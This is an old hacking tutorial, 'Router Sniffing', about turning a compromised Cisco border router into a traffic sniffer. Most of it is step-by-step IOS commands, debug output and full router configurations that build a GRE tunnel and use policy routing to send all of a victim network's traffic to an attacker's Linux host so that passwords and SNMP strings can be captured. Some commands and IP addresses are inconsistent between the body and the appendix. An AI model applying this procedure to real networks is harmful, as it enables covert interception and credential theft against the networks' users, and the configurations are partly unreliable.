From Rexploit
A network diagram is provided at the end of the document. Reference the diagram as you read the paper.
An action video of this attack can be found at http://www.hackingdefined.com/movies/gre-sniff.zip
<==============================>
|| Router Sniffing ||
|| by ||
|| William M. Hidalgo ||
|| redkommie<@>gmail.com ||
|| & ||
|| muts ||
|| http://iwhax.net ||
||mati<@>see-security.com ||
|| ||
|| UPDATED ||
<==============================>
.: Contents :.
I. INTRODUCTION
- Disclaimer
- About / What's New
- References
II. GETTING STARTED
- Outline
- Equipment
III. CONFIGURATION
- Routers
- Linux Host
IV. TESTING
V. CONCLUSION
APPENDIX
- Cloud Router Configuration
- Victim Router Configuration
- Attacker Router Configuration
.: I. INTRODUCTION :.
[-=] Disclaimer [=-]
The use of this document is for educational purposes only. Any misuse of this
document is the responsibility of the reader.
[-=] About / What's New[=-]
This paper outlines and demonstrates a practical exploit that can be performed
on compromised Cisco border routers. In no way does this mean Cisco equipment
is not secure. Proper configuration and security practices must be enforced
to minimize the chance of a security breach. Network administrator error is the
main cause of security breaches on Cisco equipment!
This is the second revision of this paper. The first paper focused on a simple
network configuration and lacked real world testing. This revision includes a
configuration and test done on a -live- network which utilizes NAT translation
at the network boundary.
[-=] References [=-]
The following articles were used as reference material.
- Things to do in Cisco Land when you are dead
http://www.phrack.com/show.php?p=56&a=10
- Red Team Assessment of Parliament Hill Firewall
http://www.giac.org/practical/Joshua_Wright_GCIH.zip
- Using a compromised Router to Capture Network Traffic
http://www.geocities.com/david_taylor_au
.: II. GETTING STARTED :.
[-=] Outline [=-]
The goal is to create a GRE tunnel between two routers (one the attacker and
the other the victim) and use policy routing to send traffic from the Victim
router to the Attacker router and have the Attacker router policy route the
traffic to a Linux host, which will act as the sniffer, inside the attackers
network. The traffic that is to be redirected must be matched using an
access-list and traffic flow in and out of the victims network must remain
active.
The reason for using GRE tunnels is to create a logical 'one hop' distance from
the Attacker router to the Victim router. Once this is done the
'set ip next-hop <ip_address>' command can be used to redirect traffic to the
Attacker router.
[-=] Equipment [=-]
The following equipment was used to perform this test:
- Two Cisco 2600 routers (All commands are IOS specific)
- Two Cisco 2950 switches (Any brand of switches can be used)
- Windows XP workstation
- Workstation running the Auditor Security Collection CD
(Auditor CD - http://www.remote-exploit.org)
.: III. CONFIGURATION :.
[-=] Routers [=-]
Configure all three routers with a basic configuration. Use the following
diagram as reference in configuring and cabling (Note: The Attacker router
has a secondary IP address in its fastethernet interface).
-= Use the network diagram as a reference throughout the document. =-
Now begins the configuration of the GRE tunnels. First we will configure the
Victim router:
(If you use NAT on your interfaces make sure tunnel0 is designated as ip nat
inside or else the forwarding of traffic out onto the internet will not work)
-=Victim Router=-
Victim(config)# interface tunnel0
Victim(config-if)# ip address 192.168.10.1 255.255.255.0
Victim(config-if)# tunnel source Ethernet0/0
Victim(config-if)# tunnel destination 80.179.20.55
Victim(config-if)# tunnel mode gre ip
Now likewise on the Attacker router.
-=Attacker Router=-
Attacker(config)# interface tunnel0
Attacker(config-if)# ip address 192.168.10.2 255.255.255.0
Attacker(config-if)# tunnel source Ethernet0/1
Attacker(config-if)# tunnel destination 62.128.40.70
Attacker(config-if)# tunnel mode gre ip
Now ping the tunnel interface IP addresses to confirm connectivity. If the
pings are successful on to configuring policy routing.
If the pings fail try the following debug command to verify connectivity. The
output shown should be similar to that below: (Note: the public IPs are those
of the external router interface and next-hop external IP interface. These
IP's should correspond to the public IP's you use)
(Done on both routers)
Victim# debug tunnel
*Mar 3 05:00:01.303: Tunnel0: GRE/IP encapsulated 62.128.40.70->80.179.20.55 (linktype=7, len=105)
*Mar 3 05:00:01.463: Tunnel0: GRE/IP to classify 80.179.20.55->62.128.40.70 (len=64 type=0x800 ttl=253 tos=0xC0)
*Mar 3 05:00:01.551: Tunnel0: adjacency fixup, 62.128.40.70->80.179.20.55, tos=0x0
*Mar 3 05:00:01.567: Tunnel0: GRE/IP to classify 80.179.20.55->62.128.40.70 (len=108 type=0x800 ttl=253 tos=0x0)
Attacker# debug tunnel
*Mar 3 06:38:50.010: Tunnel0: GRE/IP to classify 62.128.40.70->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38:50.014: Tunnel0: adjacency fixup, 80.179.20.55->62.128.40.70, tos=0x0
*Mar 3 06:38:51.007: Tunnel0: GRE/IP to classify 62.128.40.70->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38:51.007: Tunnel0: adjacency fixup, 80.179.20.55->62.128.40.70, tos=0x0g all
An access-list will be used to match the traffic we want to send through the
tunnel for this test. I had the access-list match all traffic but the
access-list can be configured to match specific traffic only like snmp, telnet, or any other traffic you desire.
-=Victim Router=-
Victim(config)# access-list 101 permit ip any any
Victim(config)# router-map divert-traffic
Victim(config-route-map)# match ip address 101
Victim(config-route-map)# set ip next-hop 192.168.10.2
Victim(config-route-map)# exit
Victim(config)# interface Ethernet0/0
Victim(config-if)# ip policy route-map divert-traffic
The Attacker router now.
-=Attacker Router=-
Attacker(config)# access-list 101 permit ip any any
Attacker(config)# router-map divert-to-sniffer
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.3.5
Attacker(config-route-map)# exit
Attacker(config)# interface tunnel0
Attacker(config-if)# ip policy route-map divert-to-sniffer
Attacker(config-if)# exit
Attacker(config-if)# route-map divert-out
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.10.1
Attacker(config-route-map)# exit
Attacker(config)# interface ethernet0/0
Attacker(config-if)# ip policy route-map divert-out
Attacker(config-if)# end
This concludes configuring the routers.
[-=] Linux Workstation [=-]
The Linux (Auditor) workstation will utilize one interface to accept inbound
traffic from the tunnel then forward it back out to the router. The workstation
will have to running a sniffing program to capture traffic or passwords.
You can use any Linux distro you like but I recommend using the Auditor
Security Collection Linux distro. Download and create a copy of the Auditor
Security Collection CD once that is done boot of the CD. For more information
on the Auditor CD go to http://new.remote-exploit.org.
Configure the interface with the following IP and gateway addresses:
[eth0]
IP: 192.168.3.5
Netmask: 255.255.255.0
Gateway: 192.168.3.1
Now enable ip forwarding.
echo 1 > /proc/sys/net/ipv4/ip_forward
Failing to do this will result in a DoS of the Victim network.
[-=] Windows Workstation [=-]
Configure the workstation with the IP and gateway of:
IP: 192.168.1.5
Netmask: 255.255.255.0
Gateway: 192.168.1.1
.: IV. TESTING :.
On the Linux workstation run a packet sniffing program, preferably Ethereal,
and start packet capture. From the Windows workstation ping an interface from
the Cloud Router and make sure that it is successful now check your Linux
workstation the packet capture program should see the ping request. All traffic
sent out of the Victim router will be seen.
If traffic doesen't seem not to be forwarded debug the policy to see if it's
working correctly on both victim and attacker.
Victim#debug ip policy
Policy routing debugging is on
*Mar 3 04:59:35.509: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, len 84, FIB policy match
*Mar 3 04:59:35.509: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, g=192.168.10.2, len 84, FIB policy routed
*Mar 3 04:59:36.510: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, len 84, FIB policy match
*Mar 3 04:59:36.510: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, g=192.168.10.2, len 84, FIB policy routed
*Mar 3 04:59:37.512: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, len 84, FIB policy match
*Mar 3 04:59:37.512: IP: s=192.168.1.5 (Ethernet0/1), d=194.90.1.5, g=192.168.10.2, len 84, FIB policy routed
Attacker#deubug ip policy
Policy routing debugging is on
*Mar 3 06:38:32.974: IP: s=192.168.1.5 (Tunnel0), d=194.90.1.5, len 84, FIB policy match
*Mar 3 06:38:32.978: IP: s=192.168.1.5 (Tunnel0), d=194.90.1.5, g=192.168.3.5, len 84, FIB policy routed
*Mar 3 06:38:32.978: IP: s=192.168.1.5 (Ethernet0/0), d=194.90.1.5, len 84, FIB policy match
*Mar 3 06:38:32.978: IP: s=192.168.1.5 (Ethernet0/0), d=194.90.1.5, g=192.168.10.1, len 84, FIB policy routed
*Mar 3 06:38:33.980: IP: s=192.168.1.5 (Tunnel0), d=194.90.1.5, len 84, FIB policy match
*Mar 3 06:38:33.980: IP: s=192.168.1.5 (Tunnel0), d=194.90.1.5, g=192.168.3.5, len 84, FIB policy routed
.: V. CONCLUSION :.
It has been proved that a router can be turned into a network sniffer with a
few commands. SNMP strings, passwords, etc. can now be captured and used to
escalate an intruders attack on the network. I hope this document will create
greater awareness on the threat that exists if a router is compromised. For
information on hardening Cisco routers visit the NSA site and download the
Router Security Guide at http://www.nsa.gov/snac/downloads_all.cfm
-=Victim Router Configuration=-
hostname Victim
enable secret class
interface Tunnel0
ip address 192.168.10.1 255.255.255.0
tunnel source Ethernet0/0
tunnel destination 80.179.40.70
interface Ethernet0/0
ip address 192.168.1.1 255.255.255.0
ip policy route-map diver-traffic
access-list 101 permit ip any any
route-map divert-traffic permit 10
match ip address 101
set ip next-hop 192.168.10.2
line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login
login
-=Attacker Router Configuration=-
hostname Attacker
enable secret class
interface Tunnel0
ip address 192.168.10.2 255.255.255.0
ip policy route-map divert-to-sniffer
tunnel source Ethernet0/1
tunnel destination 62.128.40.80
interface Ethernet0/0
ip address 192.168.3.1 255.255.255.0
ip policy route-map divert-out
line con 0
password cisco
logging synchronous
login
line aux 0
line vty 0 4
password cisco
login
